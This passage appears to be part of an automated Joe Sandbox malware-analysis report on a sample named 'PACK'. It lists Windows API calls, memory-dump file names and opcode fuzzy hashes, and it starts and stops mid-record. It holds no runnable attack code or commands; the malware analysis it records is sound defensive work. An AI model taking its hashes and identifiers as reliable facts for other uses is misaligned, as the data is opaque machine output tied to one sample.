                                                                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 002F0581
                                                                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 002F0588
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1231390398-0
                                                                                                                                              • Opcode ID: 3900bfe5114c275a12876eb89e06c38ff828f7784393f8fdb4b567bbeda507aa
                                                                                                                                              • Instruction ID: 336a90a90467991f8f8715e402c5b4b5c843a5bc5a0d8be2627dc283ab790bb5
                                                                                                                                              • Opcode Fuzzy Hash: 3900bfe5114c275a12876eb89e06c38ff828f7784393f8fdb4b567bbeda507aa
                                                                                                                                              • Instruction Fuzzy Hash: A9E09B72E2020EA75F158AA59C458FBB39DF64C381B505179EA02D3301F974DD254BA4
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0030ABA6: GetEnvironmentStringsW.KERNEL32 ref: 0030ABAF
                                                                                                                                                • Part of subcall function 0030ABA6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0030ABD2
                                                                                                                                                • Part of subcall function 0030ABA6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0030ABF8
                                                                                                                                                • Part of subcall function 0030ABA6: _free.LIBCMT ref: 0030AC0B
                                                                                                                                                • Part of subcall function 0030ABA6: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0030AC1A
                                                                                                                                              • _free.LIBCMT ref: 00306FB3
                                                                                                                                              • _free.LIBCMT ref: 00306FBA
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 400815659-0
                                                                                                                                              • Opcode ID: b31e8856ebe9d72aba45e1e6c9a0ab3430c45a85764d327756ec2196f1f81893
                                                                                                                                              • Instruction ID: 86bb0a665b906892a01de1f08c04b529c3113b87edaeeb83ec24222c3bd5f627
                                                                                                                                              • Opcode Fuzzy Hash: b31e8856ebe9d72aba45e1e6c9a0ab3430c45a85764d327756ec2196f1f81893
                                                                                                                                              • Instruction Fuzzy Hash: ACE02B3BB0F9520BD627363D3C3362F1A884BC1374F12221AFA10DF1C7DD6099220096
                                                                                                                                              APIs
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,00000001,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA143
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,002E9F65,?,?,?,002E9DFE,?,00000001,00000000,?,?), ref: 002EA174
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
Similarity
• API ID: ItemText_swprintf
• String ID:
• API String ID: 3011073432-0
APIs
• DeleteFileW.KERNEL32(?,?,?,002E9648,?,?,002E94A3), ref: 002E9E29
• DeleteFileW.KERNEL32(?,?,?,00000800,?,?,002E9648,?,?,002E94A3), ref: 002E9E57
Similarity
• API ID: DeleteFile
• String ID:
• API String ID: 4033686569-0
APIs
• GetFileAttributesW.KERNEL32(?,?,?,002E9E74,?,002E74F7,?,?,?,?), ref: 002E9E90
• GetFileAttributesW.KERNEL32(?,?,?,00000800,?,002E9E74,?,002E74F7,?,?,?,?), ref: 002E9EBC
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
APIs
• GetSystemDirectoryW.KERNEL32(?,00000800), ref: 002EFD18
• LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,002EE7F6,Crypt32.dll,?,002EE878,?,002EE85C,?,?,?,?), ref: 002EFD3A
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
APIs
• GdiplusShutdown.GDIPLUS(?,?,?,00311161,000000FF), ref: 002F9B31
• CoUninitialize.COMBASE(?,?,?,00311161,000000FF), ref: 002F9B36
Similarity
• API ID: GdiplusShutdownUninitialize
• String ID:
• API String ID: 3856339756-0
APIs
  • Part of subcall function 0030281A: try_get_function.LIBVCRUNTIME ref: 0030282F
• ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00301744
• ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0030174F
Similarity
• API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
• String ID:
• API String ID: 806969131-0
APIs
Similarity
• API ID: ItemShowWindow
• String ID:
• API String ID: 3351165006-0
APIs
• GetDlgItem.USER32(?,?), ref: 002E12A2
• KiUserCallbackDispatcher.NTDLL(00000000), ref: 002E12A9
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: CallbackDispatcherItemUser
• String ID:
• API String ID: 4250310104-0
• Opcode ID: 60799a795a51ff76ddcad295050f671e301cb1ea13517d322612a7724087f154
• Instruction ID: c34fca660d2037586e34755815d6a41b1c61ac34a2ac563c850f228712b579b9
• Opcode Fuzzy Hash: 60799a795a51ff76ddcad295050f671e301cb1ea13517d322612a7724087f154
• Instruction Fuzzy Hash: D7C04C76408250BFCB025BA09C08D6FBFADAB9D312F05C809B1A680024C7358621DB11
APIs
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 343ca2f9bfbbec8a658b1908b958e65530a81756a0e304d8126a2fbf7f50138a
• Instruction ID: 11d5fb1ea800ab0e153869781f281ce0b58e4512b485c1e68df88273f173fa18
• Opcode Fuzzy Hash: 343ca2f9bfbbec8a658b1908b958e65530a81756a0e304d8126a2fbf7f50138a
• Instruction Fuzzy Hash: B7B1D170AA06C6AFEB28CF76C484BB9FBA5BF05304F940279E455C7281D770A974CB91
APIs
• __EH_prolog.LIBCMT ref: 002E81C9
  • Part of subcall function 002E137D: __EH_prolog.LIBCMT ref: 002E1382
  • Part of subcall function 002E137D: new.LIBCMT ref: 002E13FA
  • Part of subcall function 002E1973: __EH_prolog.LIBCMT ref: 002E1978
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: 2f78951032062a2280786c88bfab09bb5fae50c32e34365567432db7e1eec2d2
• Instruction ID: 39d2da0225aca8a91b7e0cadb6137730d580a639bdf7e2b66bc251e562d26c9e
• Opcode Fuzzy Hash: 2f78951032062a2280786c88bfab09bb5fae50c32e34365567432db7e1eec2d2
• Instruction Fuzzy Hash: 1041B4719A06D49ADB24DB62C855BEAB3B89F10700F8404FAE58D93093DF745EE8DF50
APIs
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: ea3e29797dfe9f221cdc3474bbcc21b52a1fdb4702633edac90c4d39b2df2675
• Instruction ID: ecc0c516026f5a37aaa2331cf3c497453eea2491d5e8164ee17ad85f43764f61
• Opcode Fuzzy Hash: ea3e29797dfe9f221cdc3474bbcc21b52a1fdb4702633edac90c4d39b2df2675
• Instruction Fuzzy Hash: FC2109B1E5021AAFDB14DF74CC45B7AF7A8FB05794F00413AEA05EB281D7709920CAA8
APIs
• __EH_prolog.LIBCMT ref: 002F9EF4
  • Part of subcall function 002E137D: __EH_prolog.LIBCMT ref: 002E1382
  • Part of subcall function 002E137D: new.LIBCMT ref: 002E13FA
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: d16fceb090f0d709792a705a047908ef61ac94548a817c49ea679b9519bb87dc
• Instruction ID: e3dc805c80a40274a1d5568587d4beb6dba7a2b2881061c2dee90fcdcb1a7e60
• Opcode Fuzzy Hash: d16fceb090f0d709792a705a047908ef61ac94548a817c49ea679b9519bb87dc
• Instruction Fuzzy Hash: 52215771D1428E9ACF15DFA5C9819FEF7F4AF19300F4000AAE909A7202D6356E65CFA0
APIs
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: a316239fae54b597b53229672d7ec3b0be0d429c2997e8a9834b216affe90f62
• Instruction ID: 112e60daa17012bdc5cab6e8d97201532bd7d07887e9b212115b6594619796ac
• Opcode Fuzzy Hash: a316239fae54b597b53229672d7ec3b0be0d429c2997e8a9834b216affe90f62
• Instruction Fuzzy Hash: 7A11E977D6056997CF12AF99CC419EEB736AF48350F414126F8146B252CA308D658FD0
APIs
• __EH_prolog.LIBCMT ref: 002E5A22
  • Part of subcall function 002EAD1B: __EH_prolog.LIBCMT ref: 002EAD20
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: H_prolog
• String ID:
• API String ID: 3519838083-0
• Opcode ID: fb24da2b55b31425c2f5e5880c1389ce6577d7e9621af28d16c63bc9fefb0efb
• Instruction ID: 2dafcb79a6b1a9b30c6924281c5f099f9d780e3d5e06a0db389a8d90913e4e27
• Opcode Fuzzy Hash: fb24da2b55b31425c2f5e5880c1389ce6577d7e9621af28d16c63bc9fefb0efb
• Instruction Fuzzy Hash: 2C01D130979684CAD715E7A4C2053EEB7A49F25300F4005ADE48D53382DBB82B14CB63
                                                                                                                                              APIs
                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,?,?,00302FA6,?,0000015D,?,?,?,?,00304482,000000FF,00000000,?,?), ref: 00307ABC
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
• API ID: AllocateHeap
• String ID:
• API String ID: 1279760036-0
• Opcode ID: c74156c55300be90aa415656f952cccf3d9eec9ecb6e78d15020a5cf84e45fc8
• Instruction ID: e5e11066d29823e78fdca475a97fb46f1dba9829752acbf501bbb346241750bd
• Opcode Fuzzy Hash: c74156c55300be90aa415656f952cccf3d9eec9ecb6e78d15020a5cf84e45fc8
• Instruction Fuzzy Hash: DFE0ED31F0B2226AEA2326298D25B5E3A4CEB017B0F1A0120EC149A2D1CF20FE1082E1
APIs
• FindClose.KERNEL32(00000000,000000FF,?,?), ref: 002EA1E0
Similarity
• API ID: CloseFind
• String ID:
• API String ID: 1863332320-0
• Opcode ID: 771ef13b9d37a8eab0f63c439dea64dd25a1d5b620294e233028d2afcaf2b2a6
• Instruction ID: 7a1fc1145adcdb1c710a6dac56ab57936cbff14c9f971cd11fe88027f48ce75b
• Opcode Fuzzy Hash: 771ef13b9d37a8eab0f63c439dea64dd25a1d5b620294e233028d2afcaf2b2a6
• Instruction Fuzzy Hash: 43F089350687C0AACA235B7548047C77B956F1A331F448A4EF5FD12192C67564E5DB22
APIs
• SetThreadExecutionState.KERNEL32(00000001), ref: 002F031D
Similarity
• API ID: ExecutionStateThread
• String ID:
• API String ID: 2211380416-0
• Opcode ID: fd62d4df5065e17aa801e40f9d3ef46d1a7051100074b26fda4a8d6ac3aed330
• Instruction ID: daeddd14a66c343e0adb20cc9152917f4bc3f9fe0deb590acbd7148ba1181142
• Opcode Fuzzy Hash: fd62d4df5065e17aa801e40f9d3ef46d1a7051100074b26fda4a8d6ac3aed330
• Instruction Fuzzy Hash: B9D0C221A2019552EA2637252889BFE560A4F857E0F08407AB249262D3CA4508AAC7E2
APIs
• GetFileType.KERNEL32(000000FF,002E9683), ref: 002E9751
Similarity
• API ID: FileType
• String ID:
• API String ID: 3081899298-0
• Opcode ID: b7fa0dd700dfe956f60c5639f94597ae148686e1528ae4d4cfaf522d87137439
• Instruction ID: f71ef42e6797f81244a3d5fb23ab979dd9b8826844da96f5d32f9add57e6f9e9
• Opcode Fuzzy Hash: b7fa0dd700dfe956f60c5639f94597ae148686e1528ae4d4cfaf522d87137439
• Instruction Fuzzy Hash: 2DD012B0471281958F211E394E09096A655AF433A6B78C6A5D025C40B2C722C8E7F500
APIs
• SendDlgItemMessageW.USER32(0000006A,00000402,00000000,?,?), ref: 002FCA23
  • Part of subcall function 002FA388: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 002FA399
  • Part of subcall function 002FA388: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 002FA3AA
  • Part of subcall function 002FA388: IsDialogMessageW.USER32(000104A4,?), ref: 002FA3BE
  • Part of subcall function 002FA388: TranslateMessage.USER32(?), ref: 002FA3CC
  • Part of subcall function 002FA388: DispatchMessageW.USER32(?), ref: 002FA3D6
Similarity
• API ID: Message$DialogDispatchItemPeekSendTranslate
• String ID:
• API String ID: 897784432-0
• Opcode ID: 9869fadda9c966f965e7a798f8b88a313c4e274a53d5907bd4d2c530c72a4cc2
• Instruction ID: f1d5268f44078dfcefdb3c01fc6fc3ae25fdfab9af12a87cd3684836bcb8ab7b
• Opcode Fuzzy Hash: 9869fadda9c966f965e7a798f8b88a313c4e274a53d5907bd4d2c530c72a4cc2
• Instruction Fuzzy Hash: 6DD09E76154300BAD7122B51CE07F1ABBB6BB8DB44F404558B345740B1C662AD319F12
APIs
Similarity
• API ID: FreeLibrary
• String ID:
• API String ID: 3664257935-0
• Opcode ID: d9fd92a4187554c44e24c81a6f0223d9994acfb799689b19058d12d2a9626d50
• Instruction ID: 79d746c4db9c6b972dbf5fa72fce253a3da7e247e53ad3a3a738445ddcda0b45
• Opcode Fuzzy Hash: d9fd92a4187554c44e24c81a6f0223d9994acfb799689b19058d12d2a9626d50
• Instruction Fuzzy Hash: 39D0C970410212CFE7618F29E404782BBE4AF0C311B11886E90C9C2124E2704890CF50
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
  • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
  • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID:
• API String ID: 1269201914-0
• Opcode ID: 0c84e28adc865a1c28b444eb9bb1305147fda888d8ecc293447933f4f4fb1fb3
• Instruction ID: c7126236a412e7777bda897174f1775afe0392e889812007f8b5b886f59fce3f
• Opcode Fuzzy Hash: 0c84e28adc865a1c28b444eb9bb1305147fda888d8ecc293447933f4f4fb1fb3
• Instruction Fuzzy Hash: 67B012857BD108BD320E3140FD02CB7420FC1C5B55370C13AF109C008094814DD10032
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
  • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
  • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 49d63c4c9aea3df3ad9a778b4cc2ab417f7bd8926760c528e2a7be392dd7636b
                                                                                                                                              • Instruction ID: 656eb84763bbcc7c9d2ae9e7bcc2176476e39815b0fbc0cb01b4ea0db00b7521
                                                                                                                                              • Opcode Fuzzy Hash: 49d63c4c9aea3df3ad9a778b4cc2ab417f7bd8926760c528e2a7be392dd7636b
                                                                                                                                              • Instruction Fuzzy Hash: 69B0128577D004AD320E71446C02CB7430FD0C9B55370C43AF10DC0088D4814D910032
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
  • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
  • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
Memory Dump Source
• Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
• Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmp
• Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 159c25f63c37846fd14b77eeddd0d40ffab1aa4b32b9d9f772699812279d2b11
                                                                                                                                              • Instruction ID: 8c07b26ff6877387de08ea24ee0d8a91be9b859d422d041ae942d06b8e525887
                                                                                                                                              • Opcode Fuzzy Hash: 159c25f63c37846fd14b77eeddd0d40ffab1aa4b32b9d9f772699812279d2b11
                                                                                                                                              • Instruction Fuzzy Hash: 0EA0128167D005BC310931406C02C77420FC0C4B95370C429F10980040548108500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD1B6
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: e326cebb91f298f727a6b5d43f1e0308ab4eff549f1e4af1d3d3e36d01aa70f2
                                                                                                                                              • Instruction ID: 8c07b26ff6877387de08ea24ee0d8a91be9b859d422d041ae942d06b8e525887
                                                                                                                                              • Opcode Fuzzy Hash: e326cebb91f298f727a6b5d43f1e0308ab4eff549f1e4af1d3d3e36d01aa70f2
                                                                                                                                              • Instruction Fuzzy Hash: 0EA0128167D005BC310931406C02C77420FC0C4B95370C429F10980040548108500031
                                                                                                                                              APIs
                                                                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 002FD217
                                                                                                                                                • Part of subcall function 002FD53A: DloadReleaseSectionWriteAccess.DELAYIMP ref: 002FD5B7
                                                                                                                                                • Part of subcall function 002FD53A: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 002FD5C8
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 00000010.00000002.2098118288.00000000002E1000.00000020.00000001.01000000.00000012.sdmp, Offset: 002E0000, based on PE: true
                                                                                                                                              • Associated: 00000010.00000002.2098082550.00000000002E0000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098163065.0000000000312000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.000000000031D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000324000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098198355.0000000000340000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              • Associated: 00000010.00000002.2098315286.0000000000341000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_16_2_2e0000_PACK.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1269201914-0
                                                                                                                                              • Opcode ID: 874ee266fe5d118a76b3a46f2e7d535f145951547ad629c7be01ea1521d86d67
